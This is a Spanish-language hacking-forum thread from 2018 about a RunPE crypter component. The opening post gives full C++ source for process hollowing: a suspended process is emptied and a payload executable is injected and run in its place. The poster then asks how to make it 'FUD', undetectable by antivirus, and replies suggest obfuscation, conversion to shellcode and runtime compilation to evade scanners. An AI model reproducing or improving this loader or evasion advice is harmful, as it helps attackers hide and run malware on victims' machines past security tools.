comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

RunPE FUD?¿

  • 7 Respuestas
  • 504 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado Z3R0N3

  • *
  • Underc0der
  • Mensajes: 27
  • Actividad:
    0%
  • Reputación 0
  • CODED by Z3R0N3
    • Ver Perfil
« en: Julio 11, 2018, 04:57:41 am »
Hola!
Tengo un RunPE genérico (lo pongo más abajo), ¿se os ocurren formas de hacerlo FUD u otra alternativa para lograr lo mismo, por ejemplo trabajando con los fork y pid etc...?
Gracias!

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
/* RunPE */
typedef LONG (WINAPI * NtUnmapViewOfSection)(HANDLE ProcessHandle, PVOID BaseAddress);
class runPE{
    public:
        void run(LPSTR szFilePath, PVOID pFile)
        {
              PIMAGE_DOS_HEADER IDH;
            PIMAGE_NT_HEADERS INH;
            PIMAGE_SECTION_HEADER ISH;
            PROCESS_INFORMATION PI;
            STARTUPINFOA SI;
            PCONTEXT CTX;
            PDWORD dwImageBase;
            NtUnmapViewOfSection xNtUnmapViewOfSection;
            LPVOID pImageBase;
            int Count;
            IDH = PIMAGE_DOS_HEADER(pFile);
            if (IDH->e_magic == IMAGE_DOS_SIGNATURE)
            {
                INH = PIMAGE_NT_HEADERS(DWORD(pFile) + IDH->e_lfanew);
                if (INH->Signature == IMAGE_NT_SIGNATURE)
                {
                    RtlZeroMemory(&SI, sizeof(SI));
                    RtlZeroMemory(&PI, sizeof(PI));
                    if (CreateProcessA(szFilePath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &SI, &PI))
                    {
                        CTX = PCONTEXT(VirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE));
                        CTX->ContextFlags = CONTEXT_FULL;
                        if (GetThreadContext(PI.hThread, LPCONTEXT(CTX)))
                        {
                            ReadProcessMemory(PI.hProcess, LPCVOID(CTX->Ebx + 8), LPVOID(&dwImageBase), 4, NULL);
                            if (DWORD(dwImageBase) == INH->OptionalHeader.ImageBase)
                            {
                                xNtUnmapViewOfSection = NtUnmapViewOfSection(GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtUnmapViewOfSection"));
                                xNtUnmapViewOfSection(PI.hProcess, PVOID(dwImageBase));
                            }
                            pImageBase = VirtualAllocEx(PI.hProcess, LPVOID(INH->OptionalHeader.ImageBase), INH->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE);
                            if (pImageBase)
                            {
                                WriteProcessMemory(PI.hProcess, pImageBase, pFile, INH->OptionalHeader.SizeOfHeaders, NULL);
                                for (Count = 0; Count < INH->FileHeader.NumberOfSections; Count++)
                                {
                                    ISH = PIMAGE_SECTION_HEADER(DWORD(pFile) + IDH->e_lfanew + 248 + (Count * 40));
                                    WriteProcessMemory(PI.hProcess, LPVOID(DWORD(pImageBase) + ISH->VirtualAddress), LPVOID(DWORD(pFile) + ISH->PointerToRawData), ISH->SizeOfRawData, NULL);
                                }
                                WriteProcessMemory(PI.hProcess, LPVOID(CTX->Ebx + 8), LPVOID(&INH->OptionalHeader.ImageBase), 4, NULL);
                                CTX->Eax = DWORD(pImageBase) + INH->OptionalHeader.AddressOfEntryPoint;
                                SetThreadContext(PI.hThread, LPCONTEXT(CTX));
                                ResumeThread(PI.hThread);
                            }
                        }
                    }
                }
            }
            VirtualFree(pFile, 0, MEM_RELEASE);
        }
};
/* end RunPe */

Daria todo lo que sé por la mitad de lo que ignoro

Desconectado 79137913

  • *
  • Co Admin
  • Mensajes: 631
  • Actividad:
    5%
  • Reputación 11
  • 4 Esquinas
    • Ver Perfil
    • Doors.Party
    • Email
  • Skype: fg_mdq@hotmail.com
« Respuesta #1 en: Julio 11, 2018, 08:54:20 am »
HOLA!!!

Los RunPE suelen ser todos bastante parecidos, la forma de hacerlos FUD es usualmente ofuscacion de codigo y modding, la realidad es que no hay muchas maneras distintas de hacer un RunPe, usualmente lo mas comun es que se usen otros metodos para ejecutar programas.

GRACIAS POR LEER!!!
"Algunos creen que soy un bot, puede que tengan razon"
"Como no se puede igualar a Dios, ya he decidido que hacer, ¡SUPERARLO!"
"La peor de las ignorancias es no saber corregirlas"

*Shadow Scout Team*                                                   No tienes permisos para ver links. Registrate o Entra con tu cuenta

Desconectado Z3R0N3

  • *
  • Underc0der
  • Mensajes: 27
  • Actividad:
    0%
  • Reputación 0
  • CODED by Z3R0N3
    • Ver Perfil
« Respuesta #2 en: Julio 12, 2018, 04:09:29 am »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
HOLA!!!

Los RunPE suelen ser todos bastante parecidos, la forma de hacerlos FUD es usualmente ofuscacion de codigo y modding, la realidad es que no hay muchas maneras distintas de hacer un RunPe, usualmente lo mas comun es que se usen otros metodos para ejecutar programas.

GRACIAS POR LEER!!!

Ok, lo entiendo.

Me parece interesante tu respuesta en especial lo que comentas de otros métodos para ejecutar programas porque abre mucho el hilo. Supongo que te refieres a métodos para ejecutar lo que esté en memoria, ¿verdad? cifrar y descifrar a demanda... etc. Quizás me he ido por las ramas, ¿voy bien?, sería interesante conocer acerca de esto.

Gracias!
Daria todo lo que sé por la mitad de lo que ignoro

Desconectado ragaza

  • *
  • Underc0der
  • Mensajes: 49
  • Actividad:
    3.33%
  • Reputación 0
    • Ver Perfil
« Respuesta #3 en: Julio 12, 2018, 08:44:08 am »
Runpe fud usa uno hechoen asm lo pasas a shellcode lo limpias y sera fud 100% runtime/scantime forever.

Desconectado 79137913

  • *
  • Co Admin
  • Mensajes: 631
  • Actividad:
    5%
  • Reputación 11
  • 4 Esquinas
    • Ver Perfil
    • Doors.Party
    • Email
  • Skype: fg_mdq@hotmail.com
« Respuesta #4 en: Julio 12, 2018, 10:58:51 am »
HOLA!!!

No tienes permisos para ver links. Registrate o Entra con tu cuenta
Ok, lo entiendo.

Me parece interesante tu respuesta en especial lo que comentas de otros métodos para ejecutar programas porque abre mucho el hilo. Supongo que te refieres a métodos para ejecutar lo que esté en memoria, ¿verdad? cifrar y descifrar a demanda... etc. Quizás me he ido por las ramas, ¿voy bien?, sería interesante conocer acerca de esto.

Gracias!

Para mi la mejor manera de ejecutar cosas es con compilacion en runtime. (ejecutar codigo on the fly)

GRACIAS POR LEER!!!
"Algunos creen que soy un bot, puede que tengan razon"
"Como no se puede igualar a Dios, ya he decidido que hacer, ¡SUPERARLO!"
"La peor de las ignorancias es no saber corregirlas"

*Shadow Scout Team*                                                   No tienes permisos para ver links. Registrate o Entra con tu cuenta

Desconectado Z3R0N3

  • *
  • Underc0der
  • Mensajes: 27
  • Actividad:
    0%
  • Reputación 0
  • CODED by Z3R0N3
    • Ver Perfil
« Respuesta #5 en: Julio 13, 2018, 04:07:32 am »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
Runpe fud usa uno hechoen asm lo pasas a shellcode lo limpias y sera fud 100% runtime/scantime forever.

Umm.. creo que entiendo a lo que te refieres.. pero así solo quedaría scantime, ¿no?

No tienes permisos para ver links. Registrate o Entra con tu cuenta
HOLA!!!

Para mi la mejor manera de ejecutar cosas es con compilacion en runtime. (ejecutar codigo on the fly)

GRACIAS POR LEER!!!

Me gusta, ¿cómo funciona?, si se puede saber... :D
Daria todo lo que sé por la mitad de lo que ignoro

Desconectado 79137913

  • *
  • Co Admin
  • Mensajes: 631
  • Actividad:
    5%
  • Reputación 11
  • 4 Esquinas
    • Ver Perfil
    • Doors.Party
    • Email
  • Skype: fg_mdq@hotmail.com
« Respuesta #6 en: Julio 13, 2018, 08:28:44 am »
HOLA!!!

Mira este post:

No tienes permisos para ver links. Registrate o Entra con tu cuenta

GRACIAS POR LEER!!!
"Algunos creen que soy un bot, puede que tengan razon"
"Como no se puede igualar a Dios, ya he decidido que hacer, ¡SUPERARLO!"
"La peor de las ignorancias es no saber corregirlas"

*Shadow Scout Team*                                                   No tienes permisos para ver links. Registrate o Entra con tu cuenta

Desconectado Z3R0N3

  • *
  • Underc0der
  • Mensajes: 27
  • Actividad:
    0%
  • Reputación 0
  • CODED by Z3R0N3
    • Ver Perfil
« Respuesta #7 en: Julio 13, 2018, 09:02:24 am »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
HOLA!!!

Mira este post:

No tienes permisos para ver links. Registrate o Entra con tu cuenta

GRACIAS POR LEER!!!

¡Gracias por el aporte!
Daria todo lo que sé por la mitad de lo que ignoro

 

¿Te gustó el post? COMPARTILO!



RunPE y windows 10 "No se puede ejecutar esta aplicación en el equipo"

Iniciado por proxy_lainux

Respuestas: 1
Vistas: 1262
Último mensaje Agosto 28, 2016, 07:47:46 pm
por grep
Alternativas para las funciones de los runpe y encriptación ?

Iniciado por d3vilz5

Respuestas: 0
Vistas: 983
Último mensaje Mayo 27, 2013, 02:31:07 pm
por d3vilz5
Ayudar a crear un generador de runpe en vb6

Iniciado por DarkXploitz

Respuestas: 1
Vistas: 675
Último mensaje Enero 23, 2016, 07:37:37 am
por Stiuvert
[SOLUCIONADO] Ayuda al inyectar en runpe

Iniciado por Cyb3r2876

Respuestas: 1
Vistas: 911
Último mensaje Enero 19, 2014, 08:13:02 pm
por Cyb3r2876
Alguien ha hecho correr RunPE en vb.net???

Iniciado por Cyb3r2876

Respuestas: 0
Vistas: 910
Último mensaje Febrero 03, 2014, 05:55:50 pm
por Cyb3r2876